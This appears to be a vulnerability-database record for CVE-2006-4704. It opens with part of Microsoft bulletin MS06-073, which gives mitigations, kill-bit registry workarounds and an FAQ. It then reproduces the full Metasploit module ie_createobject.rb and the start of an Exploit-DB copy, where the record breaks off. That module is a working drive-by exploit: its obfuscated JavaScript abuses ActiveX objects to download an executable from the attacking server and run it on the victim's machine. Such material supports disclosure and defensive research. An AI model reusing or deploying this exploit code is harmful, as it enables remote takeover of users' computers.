Systems Management Server &#40;SMS&#41; to determine whether this update is required?&quot; for more information about SMS and EST.\r\n\r\nCan I use Systems Management Server &#40;SMS&#41; to determine whether this update is required?\r\nThe following table provides the SMS detection summary for this security update.\r\nProduct\tSMS 2.0\tSMS 2003\r\n\r\nVisual Studio 2005\r\n\t\r\n\r\nYes &#40;With EST&#41;\r\n\t\r\n\r\nYes\r\n\r\n \r\n\r\nSMS 2.0 and SMS 2003 Software Update Services &#40;SUS&#41; Feature Pack can use MBSA 1.2.1 for detection and therefore have the same limitation that is listed earlier in this bulletin related to programs that MBSA 1.2.1 does not detect.\r\n\r\nFor SMS 2.0, the SMS SUS Feature Pack, which includes the Security Update Inventory Tool &#40;SUIT&#41;, can be used by SMS to detect security updates. SMS SUIT uses the MBSA 1.2.1 engine for detection. For more information about SUIT, visit the following Microsoft Web site. For more information about the limitations of SUIT, see Microsoft Knowledge Base Article 306460. The SMS SUS Feature Pack also includes the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications.\r\n\r\nFor SMS 2003, the SMS 2003 Inventory Tool for Microsoft Updates &#40;ITMU&#41; can be used by SMS to detect security updates that are offered by Microsoft Update and that are supported by Windows Server Update Services. For more information about the SMS 2003 ITMU, visit the following Microsoft Web site. SMS 2003 can also use the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications.\r\n\r\nFor more information about SMS, visit the SMS Web site.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nCan I use SMS to determine if other programs are installed that have to be updated?\r\nYes. SMS can help detect if there are other programs installed that may have installed a version of the vulnerable component. SMS can search for the existence of the file wmiscriptutils.dll. Update all versions of wmiscriptutils.dll that are earlier than version 8.0.50727.236.\r\n\r\nWhat are the known issues that customers may experience when they install this security update?\r\nMicrosoft Knowledge Base Article 925674 documents the currently known issues that customers may experience when they install this security update. The article also documents recommended solutions for these issues. For more information, see Microsoft Knowledge Base Article 925674.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nWMI Object Broker Vulnerability - CVE-2006-4704:\r\n\r\nA remote code execution vulnerability exists in the WMI Object Broker control that the WMI Wizard uses in Visual Studio 2005.An attacker could exploit the vulnerability by constructing a specially crafted Web page that could potentially allow remote code execution if a user viewed the Web page. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\t\r\nMitigating Factors for WMI Object Broker Vulnerability - CVE-2006-4704:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker&#39;s Web site.\r\n\u2022\t\r\n\r\nBy default, this ActiveX control is not included in the default allow-list for ActiveX controls in Internet Explorer 7. Only customers who have explicitly approved this control by using the ActiveX opt-in feature are at risk to attempts to exploit this vulnerability. However, if a customer has used this ActiveX control in a previous version of Internet Explorer, then this ActiveX control is enabled to work in Internet Explorer 7, even if the customer has not explicitly approved it using the ActiveX opt-in Feature.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nThe Restricted sites zone helps reduce attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX controls from being used when reading HTML e-mail. However, if a user clicks on a link within an e-mail they could still be vulnerable to this issue through the Web-based attack scenario.\r\n \r\nBy default, all supported versions of Microsoft Outlook and Microsoft Outlook Express open HTML e-mail messages in the Restricted sites zone. The Restricted sites zone helps reduce attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX controls from being used when reading HTML e-mail. However, if a user clicks on a link within an e-mail they could still be vulnerable to this issue through the Web-based attack scenario.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that have not been added to Internet Explorer Trusted sites zone. See the FAQ section of this security update for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for WMI Object Broker Vulnerability - CVE-2006-4704:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nDisable attempts to instantiate the WMI Object Broker control\r\n\r\nYou can disable attempts to instantiate this ActiveX control in Internet Explorer by setting the kill bit for the control in the registry.\r\n\r\nWarning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.\r\n\r\nFor detailed steps that you can use to prevent a control from running in Internet Explorer, see Microsoft Knowledge Base Article 240797. Follow these steps in this article to create a Compatibility Flags value in the registry to prevent a COM object from being instantiated in Internet Explorer.\r\n\r\nTo set the kill bit for a CLSID with a value of {7F5B7F63-F06F-4331-8A26-339E03C0AE3D} paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE&#92;SOFTWARE&#92;Microsoft&#92;Internet Explorer&#92;ActiveX Compatibility&#92;{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}]\r\n&quot;Compatibility Flags&quot;=dword:00000400\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\r\nGroup Policy collection\r\n\r\nWhat is Group Policy Object Editor?\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote: You must restart Internet Explorer for your changes to take effect.\r\n\r\nImpact of Workaround: The WMI Wizard in Visual Studio 2005 may no longer display or function correctly.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running ActiveX Controls or disable ActiveX Controls in the Internet and Local intranet security zone\r\n\r\nYou can help protect against this vulnerability by changing your Internet Explorer settings to prompt before running ActiveX controls. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Run ActiveX controls and plug-ins, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Run ActiveX controls and plug-ins, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nImpact of Workaround: There are side effects to prompting before running ActiveX controls. Many Web sites that are on the Internet or on an intranet use ActiveX to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX controls to provide menus, ordering forms, or even account statements. Prompting before running ActiveX controls is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run ActiveX controls. If you do not want to be prompted for all these sites, use the steps outlined in &quot;Add sites that you trust to the Internet Explorer Trusted sites zone\u201d.\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification &#40;https:&#41; for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your computer. Two in particular that you may want to add are &quot;*.windowsupdate.microsoft.com&quot; and \u201c*.update.microsoft.com\u201d &#40;without the quotation marks&#41;. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to \u201cHigh\u201d to prompt before running ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against this vulnerability by changing your settings for the Internet security zone to prompt before running ActiveX controls. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Microsoft Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of Workaround: There are side effects to prompting before running ActiveX controls. Many Web sites that are on the Internet or on an intranet use ActiveX to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX controls to provide menus, ordering forms, or even account statements. Prompting before running ActiveX controls is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run ActiveX controls. If you do not want to be prompted for all these sites, use the steps outlined in &quot;Add sites that you trust to the Internet Explorer Trusted sites zone\u201d.\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification &#40;https:&#41; for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your computer. Two in particular that you may want to add are &quot;*.windowsupdate.microsoft.com&quot; and \u201c*.update.microsoft.com\u201d &#40;without the quotation marks&#41;. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for WMI Object Broker Vulnerability - CVE-2006-4704:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability?\r\nImproper validation of controls instantiated by WMI Object Broker causes the vulnerability. \r\n\r\nWhat is WMI Object Broker?\r\nWMI Object Broker is an ActiveX control that the WMI Wizard uses in Visual Studio 2005. When a user invokes the WMI Wizard feature of Visual Studio 2005, the wizard internally uses WMI Object Broker to instantiate other controls.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWho could exploit the vulnerability?\r\nIn a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to attempt to exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker&#39;s site.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nThis vulnerability requires that a user is logged on and visits a Web site for any malicious action to occur. Therefore, any systems that have Visual Studio 2005 installed where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer 7. Does this mitigate this vulnerability?\r\nYes. Customers who are running Internet Explorer 7 with default settings, are not at risk until the WMI Object Broker control has been activated through the ActiveX opt-in feature in the Internet Zone. However, if a customer has used this ActiveX control in a previous version of Internet Explorer, then this ActiveX control is enabled to work in Internet Explorer 7, even if the customer has not explicitly approved it using the ActiveX opt-in feature.\r\n\r\nWhat is the ActiveX opt-in feature in Internet Explorer 7?\r\nInternet Explorer 7 includes an ActiveX opt-in feature, which means that nearly all pre-installed ActiveX controls are off by default. Users are prompted by the Information Bar before they can access a previously installed ActiveX Control that has not yet been used on the Internet. This enables a user to permit or deny access on a control-by-control basis. For more information about this and other new features see the Windows Internet Explorer 7 features page.\r\n\r\nI am running Internet Explorer on Windows Server 2003. Does this mitigate this vulnerability?\r\nYes. By default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that have not been added to Internet Explorer Trusted sites zone. See the FAQ section of this security update for more information about Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat is Internet Explorer Enhanced Security Configuration?\r\nInternet Explorer Enhanced Security Configuration is a group of preconfigured Internet Explorer settings that reduce the likelihood of a user or administrator downloading and running malicious Web content on a server. Internet Explorer Enhanced Security Configuration reduces this threat by modifying numerous security-related settings, including Security and Advanced tab settings in Internet Options. Some of the key modifications include:\r\n\u2022\t\r\n\r\nSecurity level for the Internet zone is set to High. This setting disables scripts, ActiveX components, Microsoft virtual machine &#40;Microsoft VM&#41; HTML content, and file downloads.\r\n\u2022\t\r\n\r\nAutomatic detection of intranet sites is disabled. This setting assigns all intranet Web sites and all Universal Naming Convention &#40;UNC&#41; paths that are not explicitly listed in the Local intranet zone to the Internet zone.\r\n\u2022\t\r\n\r\nInstall on Demand and non-Microsoft browser extensions are disabled. This setting prevents Web pages from automatically installing components and prevents non-Microsoft extensions from running.\r\n\u2022\t\r\n\r\nMultimedia content is disabled. This setting prevents music, animations, and video clips from running.\r\n\r\nFor more information regarding Internet Explorer Enhanced Security Configuration, please consult the Managing Internet Explorer Enhanced Security Configuration guide, which can be found at the following Web site.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the WMI Object Broker instantiates other controls.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\n\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2006-4704.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nYes. This security update addresses the vulnerability that is currently being exploited. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2006-4704.\r\n\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nTippingPoint and the Zero Day Initiative, for originally reporting the WMI Object Broker Vulnerability - CVE-2006-4704.\r\n\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided &quot;as is&quot; without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 &#40;December 12, 2006&#41;: Bulletin published.", "edition": 1, "reporter": "Securityvulns", "published": "2006-12-12T00:00:00", "title": "Microsoft Security Bulletin MS06-073 Vulnerability in Visual Studio 2005 Could Allow Remote Code Execution &#40;925674&#41;", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:20", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4704"], "modified": "2006-12-12T00:00:00", "id": "SECURITYVULNS:DOC:15374", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15374", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2018-03-09T05:11:58", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects.", "reporter": "Rapid7", "published": "2009-07-22T20:14:35", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_createobject.rb", "type": "metasploit", "title": "MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003", "CVE-2006-4704"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Excellent", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CREATEOBJECT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::Seh\n include Msf::Exploit::EXE\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n # In badly misconfigured situations, IE7 and 8 could be vulnerable to\n # this, but by default they throw an ugly popup that stops all script\n # execution until the user deals with it and aborts everything if they\n # click \"no\". Not worth the risk of being unable to try more recent\n # exploits. Make sure service packs on top of 6.0 are considered less\n # than the max by setting to 6.1 (which doesn't really exist).\n :ua_maxver => \"6.1\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :method => [ 'CreateObject', 'GetObject' ],\n :classid =>\n [\n '{BD96C556-65A3-11D0-983A-00C04FC29E36}',\n '{BD96C556-65A3-11D0-983A-00C04FC29E30}',\n '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',\n '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',\n '{6414512B-B978-451D-A0D8-FCFDF33E833C}',\n '{06723E09-F4C2-43c8-8358-09FCD1DB0766}',\n '{639F725F-1B2D-4831-A9FD-874847682010}',\n '{BA018599-1DB3-44f9-83B4-461454C84BF8}',\n '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',\n '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',\n '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',\n '{0006F033-0000-0000-C000-000000000046}',\n '{0006F03A-0000-0000-C000-000000000046}',\n ],\n #:rank => ExcellentRanking # reliable exe writer\n })\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution',\n 'Description' => %q{\n This module exploits a generic code execution vulnerability in Internet\n Explorer by abusing vulnerable ActiveX objects.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'hdm',\n ],\n 'References' =>\n [\n # MDAC\n [ 'MSB', 'MS06-014' ],\n [ 'CVE', '2006-0003' ],\n [ 'OSVDB', '24517' ],\n # WMI Object Broker\n [ 'MSB', 'MS06-073' ],\n [ 'CVE', '2006-4704' ],\n [ 'OSVDB', '30155' ],\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n\n # Patched\n [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],\n # Found in mpack\n [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],\n\n # Patched\n [ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],\n\n # These are restricted by site (might be exploitable via DNS spoofing + SSL fun)\n [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],\n [ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],\n\n # Visual Studio components, not marked as safe\n [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],\n [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],\n [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],\n [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],\n [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],\n\n #\n # The controls below can launch the \"installing component\" dialogs...\n #\n\n # Not marked as safe\n [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],\n\n # Not marked as safe\n [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],\n\n # Found exploitable in the wild (no details)\n [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],\n\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 11 2006'))\n end\n\n def on_request_uri(cli, request)\n\n if (request.uri.match(/payload/))\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_exe({ :code => p.encoded })\n print_status(\"Sending EXE payload\")\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n # Build out the HTML response page\n var_html = rand_text_alpha(rand(30)+2)\n var_func_exploit = rand_text_alpha(rand(30)+2);\n var_func_go = rand_text_alpha(rand(30)+2);\n var_func_createo = rand_text_alpha(rand(30)+2);\n var_exe_name = rand_text_alpha(rand(30)+2);\n var_objects = ''\n\n # Build the object list based on target selection\n if (target.name == 'Automatic')\n targets.each do |t|\n next if not t['CLSID']\n var_objects += t['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\n end\n else\n var_objects += target['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\n end\n\n\n content = %Q^\n<html><head><title></title>\n<script language=\"javascript\">\n\nfunction #{var_func_createo}( o , n ) {\n var r = null;\n\n try { eval(\"r=o\" + \".C\" + \"re\" + \"ate\" + \"Ob\" + \"je\" + \"ct(n)\" ) }catch(e){}\n\n if (! r) {\n try { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'')\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'','')\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"je\" + \"ct('',n)\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n,'')\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n)\" ) }catch(e){}\n }\n\n return( r );\n}\n\nfunction #{var_func_go}( a ) {\n\n var s = #{var_func_createo}( a, \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" );\n\n var o = #{var_func_createo}( a, \"A\" + \"DO\" + \"D\" + \"B.S\" + \"tr\" + \"eam\" );\n\n var e = s.Environment( \"P\" + \"ro\" + \"ce\" + \"ss\" );\n\n\n var url = document.location + '/p' + 'ay' + 'lo' + 'ad';\n var xml = null;\n var bin = e.Item( \"T\" + \"E\" + \"M\" + \"P\" ) + \"\\\\\\\\#{var_exe_name}\" + \".e\" + \"xe\";\n var dat;\n\n try { xml=new XMLHttpRequest(); }\n catch(e) {\n try { xml = new ActiveXObject(\"Microsoft.XMLHTTP\"); }\n catch(e) {\n xml = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");\n }\n }\n\n if (! xml) {\n return(0);\n }\n\n xml.open(\"GET\", url, false);\n xml.send(null);\n dat = xml.responseBody;\n\n o.Type = 1 ;\n o.Mode = 3 ;\n o.Open ( ) ;\n o.Write ( dat ) ;\n o.SaveToFile ( bin, 2) ;\n\n s.Run ( bin , 0 );\n}\n\nfunction #{var_func_exploit}( ) {\n var i = 0;\n var t = new Array( #{var_objects} null );\n\n while (t[i]) {\n var a = null;\n\n if (t[i].substring(0,1) == '{') {\n a = document.createElement(\"object\");\n a.setAttribute(\"cl\" + \"as\" + \"sid\", \"cl\" + \"s\" + \"id\" +\":\" + t[i].substring( 1, t[i].length - 1 ) ) ;\n } else {\n try { a = new ActiveXObject(t[i]); } catch(e){}\n }\n\n if (a) {\n try {\n var b = #{var_func_createo}( a , \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" ) ;\n if (b) {\n #{var_func_go}( a ) ;\n return(0) ;\n }\n } catch(e){\n }\n }\n i++;\n }\n}\n</script>\n</head>\n<body onload='#{var_func_exploit}()'>\n#{var_html}\n</body>\n</html>\n\n^\n\n\n content = Rex::Text.randomize_space(content)\n\n print_status(\"Sending exploit HTML...\")\n\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_createobject.rb"}], "exploitdb": [{"lastseen": "2016-02-02T00:08:26", "osvdbidlist": ["30155", "24517"], "references": [], "edition": 1, "description": "Internet Explorer COM CreateObject Code Execution. CVE-2006-0003,CVE-2006-4704. Remote exploit for windows platform", "reporter": "metasploit", "published": "2010-09-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Microsoft Internet Explorer - COM CreateObject Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4704", "CVE-2006-0003"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16561", "href": "https://www.exploit-db.com/exploits/16561/", "sourceData": "##\r\n# $Id: ie_createobject.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Seh\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::IE,\r\n\t\t# In badly misconfigured situations, IE7 and 8 could be vulnerable to\r\n\t\t# this, but by default they throw an ugly popup that stops all script\r\n\t\t# execution until the user deals with it and aborts everything if they\r\n\t\t# click \"no\". Not worth the risk of being unable to try more recent\r\n\t\t# exploits. Make sure service packs on top of 6.0 are considered less\r\n\t\t# than the max by setting to 6.1 (which doesn't really exist).\r\n\t\t:ua_maxver => \"6.1\",\r\n\t\t:javascript => true,\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:vuln_test => 'CreateObject',\r\n\t\t:classid 